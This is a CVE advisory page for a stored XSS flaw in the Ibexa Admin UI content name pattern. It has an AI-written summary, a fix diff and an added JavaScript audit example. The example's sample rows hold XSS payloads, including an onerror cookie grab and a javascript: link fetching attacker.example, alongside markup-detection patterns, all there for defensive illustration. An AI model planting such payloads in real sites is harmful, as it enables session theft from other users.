CVE-2024-53864
Description
Ibexa Admin UI Bundle is all the necessary parts to run the Ibexa DXP Back Office interface. The Content name pattern is used to build Content names from one or more fields. An XSS vulnerability has been found in this mechanism. Content edit permission is required to exploit it. After the fix, any existing injected XSS will not run. This issue has been patched in version 4.6.14. All users are advised to upgrade. There are no known workarounds for this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
XSS vulnerability in Ibexa DXP Admin UI's Content name pattern allows stored XSS with content edit privileges; patched in v4.6.14.
Vulnerability
Overview
The Content name pattern in Ibexa Admin UI Bundle is used to dynamically build Content names from one or more fields. CVE-2024-53864 describes a stored Cross-Site Scripting (XSS) vulnerability within this mechanism. An attacker who possesses content edit permissions can inject malicious JavaScript into a field that is part of the name pattern. When the content is subsequently rendered (e.g., in the Back Office interface), the injected script executes in the context of the victim's session, potentially leading to data theft or further compromise [3][4].
Exploitation
Requirements
To exploit the vulnerability, an attacker must have content edit privileges in the Ibexa DXP system. No additional network position or authentication bypass is required; the attack is performed through normal content editing workflows. The injected payload is stored in the database and triggers whenever the affected content's name is displayed, such as in list views, breadcrumbs, or other areas that render the Content name pattern [3][4].
Impact
Successful exploitation enables arbitrary JavaScript execution in the browser of any user who views the manipulated content name. This can lead to session hijacking, actions forced on behalf of the victim, or exposure of sensitive information displayed in the same administrative interface. The sources cited here give no CVSS score and differ on the qualitative rating (Medium here, high in advisory [4]); in practice the severity is moderated by the precondition that the attacker already holds an authenticated account with content edit permissions, which limits the attacker pool to trusted editors or to anyone who has already compromised an editor account.
Mitigation
The vulnerability is patched in version 4.6.14 of the Ibexa Admin UI Bundle. Users running Ibexa DXP v4.6.* should upgrade to this version immediately. Ibexa DXP v3.3.* is not affected by this specific issue [4]. No workarounds are available; the fix ensures that previously injected XSS payloads no longer execute, although it does not remove them from stored content names, so an audit of existing names is still worthwhile after upgrading [1][3]. The fix shipped as part of a broader security release (Ibexa SA-2024-006) that also addresses other issues, so the upgrade is strongly recommended [4].
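The following JavaScript is an added illustration, not code from Ibexa or from the advisory, covering both the mechanism described under Overview and Exploitation and the post-upgrade check a practitioner would want after the Mitigation above. It models how a name pattern of the form `<title> (<author|name>)` carries editor-supplied field values verbatim into the stored name (the `<field>` placeholder syntax with `|` fallback is an assumption modelled on Ibexa's pattern syntax), shows the escaping that an innerHTML sink lacks and an innerText sink gets for free, and audits a constructed set of stored names for payloads that would have executed before the fix. The rows and the `attacker.example` host are constructed sample data.

```javascript
// Added example, not Ibexa code. Assumptions: Ibexa-style "<field_identifier>"
// placeholders with "|" fallback in the name pattern; constructed sample rows.

const PLACEHOLDER = /<([a-z0-9_]+(?:\|[a-z0-9_]+)*)>/gi;

// Build a content name from a pattern such as "<title> (<author|name>)".
// Field values are inserted verbatim: the pattern mechanism never encodes,
// so whatever an editor typed into a field ends up in the stored name.
function buildContentName(pattern, fields) {
  return pattern.replace(PLACEHOLDER, (_match, group) => {
    for (const id of group.split('|')) {
      const v = fields[id];
      if (v !== undefined && v !== null && String(v) !== '') return String(v);
    }
    return '';
  });
}

// Escape for an HTML context. In effect this is what the fix achieves by
// assigning innerText instead of innerHTML: the name is treated as text.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Reasons a stored name would have been parsed as active markup when assigned
// to innerHTML. Plain text such as "1 < 2" is not flagged, and the handler and
// URL checks only fire inside a tag, so escaped text is not flagged either.
function markupFindings(name) {
  const findings = [];
  if (/<\/?[a-z][^>]*>/i.test(name)) findings.push('html tag');
  if (/<(script|iframe|object|embed)\b/i.test(name)) findings.push('script-capable element');
  if (/<[^>]*\bon[a-z]+\s*=/i.test(name)) findings.push('event handler attribute');
  if (/<[^>]*javascript\s*:/i.test(name)) findings.push('javascript: URL');
  return findings;
}

// Audit rows of {id, name} (a dump of stored content names) and return the
// rows that carry markup, with the reasons attached.
function auditStoredNames(rows) {
  return rows
    .map((r) => ({ id: r.id, name: r.name, findings: markupFindings(r.name) }))
    .filter((r) => r.findings.length > 0);
}

// Constructed sample rows standing in for a dump of stored content names.
const NAME_PATTERN = '<title> (<author|name>)';
const SAMPLE_ROWS = [
  { id: 41, name: buildContentName(NAME_PATTERN, { title: 'Quarterly report', author: 'Anna' }) },
  // No "author" field, so the pattern falls back to "name"; the title field
  // carries the payload straight into the stored name.
  { id: 42, name: buildContentName(NAME_PATTERN, { title: 'Hello <img src=x onerror=alert(document.cookie)>', name: 'Editor' }) },
  { id: 43, name: '1 < 2 is true' },
  { id: 44, name: '<a href="javascript:fetch(\'//attacker.example\')">Click</a>' },
  { id: 45, name: '<b>bold</b> title' },
];

const AUDIT_REPORT = auditStoredNames(SAMPLE_ROWS);
for (const hit of AUDIT_REPORT) {
  console.log(`content ${hit.id}: ${hit.findings.join(', ')}`);
  console.log(`  stored : ${hit.name}`);
  console.log(`  escaped: ${escapeHtml(hit.name)}`);
}
```

Row 45 is flagged even though it carries no handler: any name that an innerHTML sink would parse as an element is worth reviewing, because it proves an editor was able to store markup through the pattern. Run the audit over a real export of content names after upgrading, and treat every hit as an indicator of a prior injection attempt by that editor's account.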
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| ibexa/admin-ui (Packagist) | >= 4.6.0, < 4.6.14 | 4.6.14 |
Patches
2714b80ab1f168ec824a8cf06 IBX-9181: Changed innerHTML to innerText
1 file changed · +1 −1
src/bundle/Resources/public/js/scripts/helpers/tooltips.helper.js+1 −1 modified@@ -82,7 +82,7 @@ const modifyPopperConfig = (iframe, defaultBsPopperConfig) => { const getTextHeight = (text, styles) => { const tag = doc.createElement('div'); - tag.innerHTML = text; + tag.innerText = text; for (const key in styles) { tag.style[key] = styles[key];
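Review bot: the switch to `tag.innerText = text` in getTextHeight is worth a one-line comment on why innerText rather than textContent, since the innerText setter turns "\n" in the text into `<br>` elements and textContent does not; if the measuring div is meant to report the height of multi-line tooltip text that is the right choice, otherwise `tag.textContent = text` is the conventional setter with the same effect of treating the name as text instead of parsing it. Because this is the whole patch (1 file, +1 −1), it hardens only the height-measurement helper; a reviewer would also confirm that the tooltip body shown to the user is not assigned through innerHTML elsewhere, and note that any name that legitimately contained markup will now be measured as a single literal line.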
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-8w3p-gf85-qcch (GHSA advisory)
- nvd.nist.gov/vuln/detail/CVE-2024-53864 (NVD)
- developers.ibexa.co/security-advisories/ibexa-sa-2024-006-vulnerabilities-in-content-name-pattern-commerce-shop-and-varnish-vhost-templates (vendor advisory)
- doc.ibexa.co/en/latest/update_and_migration/from_4.6/update_from_4.6/ (upgrade documentation)
- github.com/ibexa/admin-ui/commit/8ec824a8cf06c566ed88e4c21cc66f7ed42649fc (fix commit)
- github.com/ibexa/admin-ui/security/advisories/GHSA-8w3p-gf85-qcch (repository advisory)